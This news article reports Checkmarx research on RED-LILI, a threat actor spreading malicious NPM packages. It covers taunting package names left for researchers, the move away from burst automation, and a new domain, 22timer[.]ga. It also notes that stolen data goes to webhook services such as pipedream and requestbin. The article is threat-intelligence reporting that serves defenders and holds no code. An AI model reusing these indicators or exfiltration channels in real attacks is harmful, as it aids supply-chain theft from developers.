Researchers probing the attacks have discovered a trail of concealed messages left by a mysterious threat actor.
Checkmarx published a blog article recently about a threat actor known as RED-LILI, who has been spreading malicious NPM packages using automatically created user accounts.
The RED-LILI Tracker was also built by the company to share information about the attacker’s packages with the community.
The recent data, however, imply that RED-LILI has reacted negatively to the attention of Checkmarx researchers.
Get a free copy of the Hacker’s Manual 2022 if you share your opinions about cybersecurity. Assist us in determining how organizations are preparing for a post-Covid environment, as well as the ramifications of these initiatives on their cybersecurity strategies. To receive the $10.99/£10.99 bookazine, enter your email at the end of the survey.
Secret messages In response to the blog, RED-LILI changed their strategy. The threat actor began leaving messages for the researchers in addition to attempting to make the malicious packages appear more believable and obfuscating the dangerous code.
These messages were delivered using package names that “deviated from the usual pattern,” such as:
- Dontbelikethat
- Notsobrilliant
- Dontgothereever
- sdontblowthisoff
- heisnotwhatyousee
- shelloboy634
- nosoawesome232
- F**kyouscanner
The researchers discovered that RED-LILI has slowed and ceased burst automation attacks since the initial disclosure. RED-LILI also got rid of outdated domain names and got a new one: 22timer[.]ga.
As RED-LILI now explores and distributes cherry-picked packages, each with its own unique evasion technique, the researchers believe the next wave of the attack is still to come.
“However, because they re-use comparable traits (code similarities, same identifying strings, etc.), the attacker’s thumbprint remains,” the researchers found.
“In recent packages, they are doing it while exfiltrating the data they capture to previously unknown addresses on various platforms, such as free webhook providers like pipedream and requestbin,” says the researcher.
